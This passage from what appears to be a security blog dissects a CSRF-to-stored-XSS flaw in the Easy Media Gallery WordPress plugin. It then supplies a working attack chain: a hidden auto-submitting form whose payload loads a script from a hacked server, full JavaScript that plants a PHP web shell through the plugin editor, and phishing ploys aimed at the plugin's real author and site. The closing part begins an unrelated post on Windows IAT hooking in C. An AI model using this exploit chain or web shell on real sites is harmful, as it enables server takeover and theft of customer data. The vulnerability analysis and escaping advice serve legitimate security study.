<span class="x"> } else if (isset($_REQUEST['action']) && 'reset' == $_REQUEST['action']) {</span>
<span class="x"> // RESTORE DEFAULT SETTINGS</span>
<span class="x"> easymedia_restore_to_default($_REQUEST['action']);</span>
<span class="x">// END</span>
<span class="x"> header("Location: edit.php?post_type=easymediagallery&page=emg_settings&reset=true");</span>
<span class="x"> die;</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> add_submenu_page(</span>
<span class="x"> 'edit.php?post_type=easymediagallery', __('Easy Media Gallery Settings', 'easmedia'), __('Settings', 'easmedia'), 'manage_options', 'emg_settings', 'spg_admin'</span>
<span class="x"> );</span>
<span class="x">}</span>
<span class="x">// Lots of other code</span>
<span class="x">// .</span>
<span class="x">// .</span>
<span class="x">// .</span>
<span class="x">add_action('admin_menu', 'spg_add_admin');</span>
</code></pre></div>
<p>So what does the above code do (wrong)?</p>
<p>Well, first of all, it's a callback function that gets triggered when
the admin menu is built, because that is where the hook 'admin_menu' fires.
So this function is executed whenever an admin user visits the
administration panel. Inside the function, there is a call to is_admin()
(which only tells whether the request targets an administration page, not
whether the user is an administrator) and a check on two query parameters.
Because isset() returns a boolean, comparing its result with a non-empty
string merely tests that the parameters are present, whatever their values.
One layer further into the if
statements, the code verifies whether the parameter 'action' is set to
'save'. If so, the function continues to update the database <em>with
user-supplied options</em> for the plugin in a foreach loop. The other
if-branch is of no further interest here (although it can also
be considered a CSRF), because it only allows attackers to reset
options.</p>
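<p>The guard at the top of the function deserves a closer look. In PHP, isset() returns a boolean, and a loose comparison between a boolean and a string converts the string to a boolean first. The following Python sketch emulates that comparison to show which query strings get through. The helper names are made up for illustration, and the is_admin() call is left out.</p>

```python
def php_string_to_bool(value):
    """Emulate PHP's string-to-boolean conversion: only "" and "0" are false."""
    return value not in ("", "0")


def php_bool_loose_equals_string(flag, value):
    """Emulate `$flag == $value` in PHP when $flag is a boolean and $value a string."""
    return flag == php_string_to_bool(value)


def plugin_guard_passes(query):
    """Emulate the two isset(...) == '...' checks from spg_add_admin().

    `query` is a dict of GET parameters; membership plays the role of isset().
    """
    page_ok = php_bool_loose_equals_string("page" in query, "emg_settings")
    type_ok = php_bool_loose_equals_string("post_type" in query, "easymediagallery")
    return page_ok and type_ok


if __name__ == "__main__":
    # The value of 'page' is irrelevant as long as the parameter is present.
    print(plugin_guard_passes({"page": "settings", "post_type": "easymediagallery"}))
    # A missing parameter is the only thing that makes the guard fail.
    print(plugin_guard_passes({"post_type": "easymediagallery"}))
```

<p>So under these semantics, any request that carries both parameters reaches the save branch, whatever values they hold.</p>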
<p>So which options can we update? And why is it dangerous that we may
trick an admin user into updating the options with values set to our
liking?</p>
<p>To answer the first question, these are the keys to the plugin options
that we can update:</p>
<div class="highlight"><pre><span></span><code>easymedia_columns
easymedia_alignstyle
easymedia_img_size_limit
easymedia_vid_size
easymedia_disen_autoplv
easymedia_disen_autopl
easymedia_disen_audio_loop
easymedia_audio_vol
easymedia_box_style
easymedia_cur_style
easymedia_mag_icon
easymedia_frm_size
easymedia_frm_col
easymedia_ttl_col
easymedia_brdr_rds
easymedia_thumb_col
easymedia_hover_opcty
easymedia_style_pattern <-- This looks like a good injection point --|
easymedia_disen_bor
easymedia_disen_hovstyle
easymedia_disen_plug
easymedia_disen_rclick
easymedia_disen_databk
easymedia_disen_admnotify
easymedia_disen_dasnews
easymedia_disen_ajax
easymedia_ajax_con_id
easymedia_plugin_core
</code></pre></div>
<p>And now let's discuss the second question: It is common for developers
to output data originating from the database without sanitizing it. The
belief is probably something like <em>Why should I consider the data in my
own database to be dangerous?</em>. But you have to sanitize your data at
some point, and the best moment to do so is just
before the critical action happens. Escape HTML attributes before you
print data to the screen. Prevent SQL injections right before crafting
the query. This strategy is called outbound input handling. You can read
more about it on
<a href="http://excess-xss.com/" title="Good article about XSS">excess-xss.com</a>.</p>
<p>But the authors at Ghozylab applied neither inbound nor outbound
input handling, which leads to potentially malicious code in the database
that is eventually printed to the administration screen, causing a
stored XSS (the output and admin menu generation code is also in
wp-content/plugins/easy-media-gallery/includes/emg-settings.php, between
lines 275 and 520).</p>
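<p>To illustrate what outbound handling buys you, here is a small Python sketch that escapes a stored value right before it is printed into an HTML attribute. The function <em>render_input()</em> is a made-up stand-in for the plugin's output code. In WordPress itself the corresponding escaping helper is esc_attr(), while this sketch uses Python's html.escape().</p>

```python
import html

# The value an attacker managed to store in the options table (taken from the POC).
STORED_VALUE = (
    'pattern-01.png" name="easymedia_style_pattern" '
    'id="easymedia_style_pattern" />'
    '<script src=http://somehackedserver.com/plugin-loader.js>//Nothin here</script>'
)


def render_input(name, value):
    """Print an option into a form field, escaping it at output time."""
    safe_name = html.escape(name, quote=True)
    # quote=True also escapes " and ', so the value cannot leave the attribute.
    safe_value = html.escape(value, quote=True)
    return f'<input type="text" name="{safe_name}" value="{safe_value}" />'


if __name__ == "__main__":
    print(render_input("easymedia_style_pattern", STORED_VALUE))
```

<p>With the quotes and angle brackets turned into entities, the stored string stays inside the value attribute and is displayed as text instead of being interpreted as markup.</p>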
<p>Again, in short: because there is no way to guarantee
that the action originated from an intentional form submission by the
administrator (there are no anti
Cross-Site-Request-Forgery checks such as check_admin_referer() or
check_ajax_referer()), any attacker can set up a page that
incorporates the following hidden form. Note that the form
submits itself stealthily, so that a visitor isn't able to
observe anything suspicious.</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span>
<span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>XSS POC<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"UTF-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">"viewport"</span> <span class="na">content</span><span class="o">=</span><span class="s">"width=device-width"</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">div</span> <span class="na">style</span><span class="o">=</span><span class="s">"display:none;"</span><span class="p">></span>
<span class="p"><</span><span class="nt">iframe</span> <span class="na">id</span><span class="o">=</span><span class="s">"xss-test-iframe"</span> <span class="na">name</span><span class="o">=</span><span class="s">"xss-test-iframe"</span><span class="p">></</span><span class="nt">iframe</span><span class="p">></span>
<span class="p"><</span><span class="nt">form</span> <span class="na">id</span><span class="o">=</span><span class="s">"xss-test"</span> <span class="na">action</span><span class="o">=</span><span class="s">"http://localhost/~nikolai/wordpress_pentest/wordpress/wp-admin/index.php?page=settings&post_type=easymediagallery"</span> <span class="na">method</span><span class="o">=</span><span class="s">"POST"</span><span class="p">></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"action"</span> <span class="na">value</span><span class="o">=</span><span class="s">"save"</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"easymedia_style_pattern"</span> <span class="na">value</span><span class="o">=</span><span class="s">'pattern-01.png" name="easymedia_style_pattern" id="easymedia_style_pattern" /><script src=http://somehackedserver.com/plugin-loader.js>//Nothin here</script>'</span> <span class="p">/></span>
<span class="p"></</span><span class="nt">form</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span><span class="p">></span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'xss-test'</span><span class="p">).</span><span class="nx">submit</span><span class="p">();</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">div</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>Of course the appropriate values have to be set to match the victim's
server. So if we wanted to target the plugin developer, we
would just use the following URL in the POST form</p>
<div class="highlight"><pre><span></span><code>http://ghozylab.com/wp-admin/index.php?page=settings&post_type=easymediagallery
</code></pre></div>
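<p>and we would host the JavaScript payload on a hacked server. But wait,
what does the payload in the above POC actually do? It closes the attribute
and the tag it is printed into, and then appends a script tag:</p>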
<div class="highlight"><pre><span></span><code>pattern-01.png" name="easymedia_style_pattern" id="easymedia_style_pattern" /><span class="nt"><script</span> <span class="na">src=</span><span class="s">http://somehackedserver.com/plugin-loader.js</span><span class="nt">></span>//Nothin here<span class="nt"></script></span>
</code></pre></div>
<p>Now that we can execute arbitrary javascript code in the context of the
admin, what can we possibly do? Well, we can gain remote code execution.
That's the worst outcome of any possible web hack attack, because it
allows us to gain a foothold on the server. Possible scenarios from
there: Steal the databases (money), try to gain root privileges on the
server in order to completely own it. But this is usually kinda hard.</p>
<p>Anyways, the javascript that is loaded by the stored XSS modifies the
standard plugin hello.php (hello dolly plugin, it's installed by
default) and adds a PHP webshell to it.</p>
<p>Want to see how I implemented it?</p>
<p>It's rather straightforward and there are probably more elegant ways,
such as using jQuery. Keep in mind that the URLs are set to my local
pentest server, except ALERT_URL, which is just made up. In the real
world, you'd replace the URLs with those of a hacked server that you own and
from which you start and execute your attacks.</p>
<div class="highlight"><pre><span></span><code> <span class="cm">/* </span>
<span class="cm"> * Copyright: Nikolai Tschacher.</span>
<span class="cm"> * Site: incolumitas.com</span>
<span class="cm"> * Easy as pie.</span>
<span class="cm"> * What: Use this code when you found a stored XSS in a wordpress plugin to gain RCE.</span>
<span class="cm"> * How: A wordpress admin needs to run this code in his browser with a valid session id.</span>
<span class="cm"> * Idea: Modify the flash-album-gallery plugin via wordpress admin panel.</span>
<span class="cm"> * </span>
<span class="cm"> * Note: This is actually nothing new. It's just one of many ways to gain RCE</span>
<span class="cm"> * if you have a stored XSS in a wordpress session.</span>
<span class="cm"> */</span>
<span class="c1">// Without php tags</span>
<span class="c1">// HTML meta chars are in character entity references format.</span>
<span class="kd">var</span> <span class="nx">EXPLOIT_CODE</span> <span class="o">=</span> <span class="s2">"\nif (isset($_GET[&#039;cmd&#039;])&amp;&amp; !empty($_GET[&#039;cmd&#039;])){ echo &#039;<pre>&#039;;system($_GET[&#039;cmd&#039;]);echo &#039;</pre>&#039;; }"</span><span class="p">;</span>
<span class="c1">// TARGET SETTINGS. Set stuff here.</span>
<span class="kd">var</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">=</span> <span class="s2">"http://localhost/wordpress"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">=</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">+</span> <span class="s2">"/wp-admin/plugin-editor.php"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">=</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">+</span> <span class="s2">"?file=flash-album-gallery/flag.php"</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">XMLHttpRequest</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// For recent browsers.</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">ActiveXObject</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Older IE 6,7,8</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ActiveXObject</span><span class="p">(</span><span class="s2">"MSXML2.XMLHTTP.3.0"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ref</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* Extract the nonce */</span>
<span class="kd">function</span> <span class="nx">exploit</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">req</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">res</span> <span class="o">=</span> <span class="sr">/name="_wpnonce"\svalue=\"[a-z0-9]{10}\"/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">length</span> <span class="o">==</span> <span class="mf">1</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="sr">/[a-z0-9]{10}/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">res</span><span class="p">[</span><span class="mf">0</span><span class="p">]);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// The site is not available. Maybe the plugin is not installed?!</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">PLUGIN_EDIT_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<span class="p">}</span>
<span class="cm">/* Modify the plugin with malicious code using the plugin editor */</span>
<span class="kd">function</span> <span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Get the plugin code</span>
<span class="c1">// On each wordpress plugin edit site, there's just one textarea tag.</span>
<span class="c1">// The plugin code itself lies between the textarea tags.</span>
<span class="c1">// These regexes aren't really good.</span>
<span class="kd">var</span> <span class="nx">startIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<textarea.*?name="newcontent".*?>/</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">stopIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<\/textarea>/</span><span class="p">);</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">substring</span><span class="p">(</span><span class="nx">startIndex</span><span class="p">.</span><span class="nx">index</span><span class="o">+</span><span class="nx">startIndex</span><span class="p">[</span><span class="mf">0</span><span class="p">].</span><span class="nx">length</span><span class="p">,</span> <span class="nx">stopIndex</span><span class="p">.</span><span class="nx">index</span><span class="p">);</span>
<span class="c1">// add our exploit code at the beginning of the plugin after the "// Stop direct call" comment.</span>
<span class="k">if</span> <span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="c1">// Let's go for the first line after the obligatory wp plugin comment and lets use the closing comment</span>
<span class="c1">// characters */ as needle as a fallback.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/^(\*\/)/m</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="s2">"\n"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// We need to consider that the plugin code in this state is making use of Character entity references</span>
<span class="c1">// for all html meta characters like " ' < > & \ to avoid them being interpreted as markup.</span>
<span class="c1">// We need to replace them with their "real" characters, before we send the plugin as post data.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">);</span>
<span class="c1">// Ready to build our POST request</span>
<span class="nx">preq</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">preq</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">successPattern</span> <span class="o">=</span> <span class="sr">/File\sedited\ssuccessfully./</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">successPattern</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">responseText</span><span class="p">))</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Done."</span><span class="p">);</span>
<span class="c1">// Notify the attacker that the exploit has been spawned.</span>
<span class="k">else</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Nope."</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">PLUGIN_EDITOR_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">);</span>
<span class="nx">pd</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">_wpnonce</span><span class="o">:</span> <span class="nx">nonce</span><span class="p">,</span>
<span class="nx">_wp_http_referer</span><span class="o">:</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">+</span> <span class="s2">"&a=te&scrollto=0"</span><span class="p">,</span>
<span class="nx">a</span><span class="o">:</span> <span class="s2">""</span><span class="p">,</span>
<span class="nx">scrollto</span><span class="o">:</span> <span class="s2">"192"</span><span class="p">,</span>
<span class="nx">newcontent</span><span class="o">:</span> <span class="nb">encodeURIComponent</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">),</span>
<span class="nx">action</span><span class="o">:</span> <span class="s2">"update"</span><span class="p">,</span>
<span class="nx">file</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">plugin</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">submit</span><span class="o">:</span> <span class="s2">"Update+File"</span>
<span class="p">};</span>
<span class="c1">// Build the post data.</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">key</span> <span class="ow">in</span> <span class="nx">pd</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">postdata</span> <span class="o">+=</span> <span class="p">(</span><span class="nx">key</span> <span class="o">+</span> <span class="s2">"="</span> <span class="o">+</span> <span class="nx">pd</span><span class="p">[</span><span class="nx">key</span><span class="p">]</span> <span class="o">+</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">length</span><span class="o">-</span><span class="mf">1</span><span class="p">);</span> <span class="c1">// rstrip the last &</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">postdata</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Removes the HTML char entity references for the HTML meta characters.</span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="ow">typeof</span> <span class="nx">data</span><span class="p">)</span> <span class="o">!==</span> <span class="s2">"string"</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="ow">new</span> <span class="ne">TypeError</span><span class="p">(</span><span class="s2">"data needs to be a string"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&quot;/g</span><span class="p">,</span> <span class="s2">"\""</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&#039;/g</span><span class="p">,</span> <span class="s2">"'"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&gt;/g</span><span class="p">,</span> <span class="s2">">"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&amp;/g</span><span class="p">,</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">data</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">exploit</span><span class="p">();</span>
</code></pre></div>
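<p>A side note on the <code>removeCharEntityReferences</code> helper above: the order of the replacements matters, and decoding <code>&amp;amp;</code> last is what keeps text that was escaped once from being decoded twice. The following is only a minimal, standalone sketch of that point. The function names <code>decodeBasicEntities</code> and <code>decodeAmpFirst</code> and the sample string are made up for illustration and are not part of the original script.</p>

```javascript
// Decode the same five entities as the helper above, with &amp; handled last.
// (Hypothetical name, used only for this illustration.)
function decodeBasicEntities(text) {
  if (typeof text !== "string") {
    throw new TypeError("text needs to be a string");
  }
  return text
    .replace(/&quot;/g, "\"")
    .replace(/&#039;/g, "'")
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&amp;/g, "&"); // last, so "&amp;lt;" becomes "&lt;" and stops there
}

// Deliberately wrong variant: decoding &amp; first turns "&amp;lt;" into
// "&lt;", which the later replacement then decodes a second time.
function decodeAmpFirst(text) {
  return text
    .replace(/&amp;/g, "&")
    .replace(/&quot;/g, "\"")
    .replace(/&#039;/g, "'")
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">");
}

// A line of source that itself contains the literal text "&lt;",
// as it would appear once escaped inside a textarea.
var escaped = "echo &quot;a &amp;lt; b&quot;;";

console.log(decodeBasicEntities(escaped));
console.log(decodeAmpFirst(escaped));
```

<p>With the correct order, the literal <code>&amp;lt;</code> inside the source survives the round trip. With the wrong order it silently turns into a bare <code>&lt;</code> and the file content changes.</p>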
<h3>How dangerous is the vulnerability?</h3>
<p>I'd say such security holes are <strong>very dangerous</strong>.</p>
<p>Of course, you need a minimal social engineering effort to make
the victim visit your attacking site, which hosts the auto-submitting
form that in turn triggers the XSS. Additionally, you need
to ensure that the victim holds valid admin cookies for his WordPress
site. But there are ways to increase the likelihood that he has a valid
admin session when you attack him (or better: when he visits the
attacking site).</p>
<p>For example, here are some ways to deliver the attack:</p>
<ul>
<li>Post a comment on the target site. Then place a URL of your
attacking site within the comment. The victim admin will only see
the comment when he is logged in to approve or deny the publishing
of your comment. Hence he <em>must</em> have a valid admin session. So when
he clicks on the link: Boom, the server is completely fucked up!</li>
<li>Attack the author of the plugin. It is very likely that they have
the most recent version (and thus the vulnerability) installed on
their server. Write an email and feign a little issue with the
<em>otherwise very cool and nice plugin</em>. Explain that you purchased
the PRO version of the plugin and that you experience issues with
some functionality in the administration form (this forces the plugin
author to verify whether he has the same issues on his site, which
tricks him into logging in and obtaining the necessary admin cookie).
Then add a detailed and plausible error explanation on your
attacking site, where the trigger is hidden (see POC above). The
victim visits and boom, you own the server and all the financial
data of the purchases made by the customers (which is most
likely on the same site as the plugin publisher's). If you own the
plugin author's website and you managed to exploit it in a stealthy
way, you can continue to spread malware from there.</li>
</ul>
<p>The only drawback I have found in my tests so far is that the
attacking form makes the victim visit his own admin menu. There is
no way to load the page hidden and execute the JavaScript without
changing the current screen of the browser to the admin form of the
victim, because in most cases WordPress (or sometimes the web server)
automatically sends the header</p>
<div class="highlight"><pre><span></span><code>X-Frame-Options: SAMEORIGIN
</code></pre></div>
<p>which <a href="https://developer.mozilla.org/en-US/docs/HTTP/X-Frame-Options" title="x-frame-header prevents stealth xss">cripples all attempts to load the DOM in a hidden
iframe</a>.
Thus, I cannot see a proper way to attack a victim without making him
notice that something <em>odd</em> is going on. The plugin author would begin
to ask himself: Why the hell am I being redirected to the administration
menu of my own blog when I just clicked on the link given by this clueless
customer who so desperately needs help with his little issue? Is there
something fishy? Am I being tricked?</p>
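<p>To make the effect of that header concrete, here is a rough sketch of the decision a browser makes before rendering a page inside a frame. It is a simplified model under stated assumptions: it only compares the framed page with its direct parent, it ignores the CSP <code>frame-ancestors</code> directive, and the function name <code>framingAllowed</code> as well as the example origins are hypothetical.</p>

```javascript
// Simplified model of X-Frame-Options handling (assumption: only the direct
// parent frame is checked, and CSP frame-ancestors is not considered).
function framingAllowed(xfoValue, pageOrigin, parentOrigin) {
  if (xfoValue === null || xfoValue === undefined) {
    return true; // no header sent: X-Frame-Options imposes no restriction
  }
  var value = String(xfoValue).trim().toUpperCase();
  if (value === "DENY") {
    return false; // never render inside a frame
  }
  if (value === "SAMEORIGIN") {
    return pageOrigin === parentOrigin; // only the site itself may frame it
  }
  return true; // unrecognised values are treated as if no header was sent
}

// The admin page of a blog, framed by a foreign site and by the blog itself.
console.log(framingAllowed("SAMEORIGIN", "https://blog.example", "https://attacker.example"));
console.log(framingAllowed("SAMEORIGIN", "https://blog.example", "https://blog.example"));
```

<p>For the scenario described here, the first call is the relevant one: the admin page is requested from a foreign origin, so the browser refuses to render it in the hidden frame.</p>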
<p>But usually, by then it's too late and I already have shell access to the
server.</p>
<p>So further research is needed. In particular: do you have an
idea for executing the attack more stealthily, such that the POST request
that causes the XSS doesn't inevitably send the victim to the sink
of the tainted data?</p>
<p>Please send me a comment if you have an idea!</p>
<p>Cheers</p>IAT hooking2013-12-07T11:37:00+01:002013-12-07T11:37:00+01:00Nikolai Tschachertag:incolumitas.com,2013-12-07:/2013/12/07/iat-hooking/<h3>What</h3>
<p>I just rummaged through my old hard disk and stumbled across
some old C sources from around a year ago, when I played with IAT hooking
on Windows 7. I will not explain much, but I wrote the code below around
a year ago (thus, in 2012) and it should be able to hook any code
(depicted as the handler here) into running processes via the IAT. I
suppose the code is not working properly, but it gives a good picture of
what an IAT hooking approach might look like.</p>
<h3><a href="http://www.youtube.com/watch?v=432PZ9787n0">What'll you do?</a></h3>
<p>Hopefully I'll find some time and motivation (or more appropriately:
discipline) to update the little library and finally complete it. Maybe
I will also make it compatible with Windows 8, but I assume it's not
really different from Windows 7 (hell, I don't know anything about the
Windows API)...</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf">"main.h"</span><span class="cp"></span>
<span class="cm">/* </span>
<span class="cm"> * Implements a little library to Hook the WinApi on running programs.</span>
<span class="cm"> * Furthermore, the API provides functions to find code caves and little hook templates for the most common scenarios</span>
<span class="cm"> * when we use hooking: Intercept function parameters and monitor output...</span>
<span class="cm"> * Supports both, 32 and 64 bit Windows XP to Windows 7. The code is pretty bloated, because</span>
<span class="cm"> * I intended to catch as many errors as possible and included some debug stuff. This hooking 'library' shall be reliable.</span>
<span class="cm"> * It provides just IAT hooking, no other code injections.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="kt">int</span><span class="w"></span>
<span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">argv</span><span class="p">[])</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">;</span><span class="w"></span>
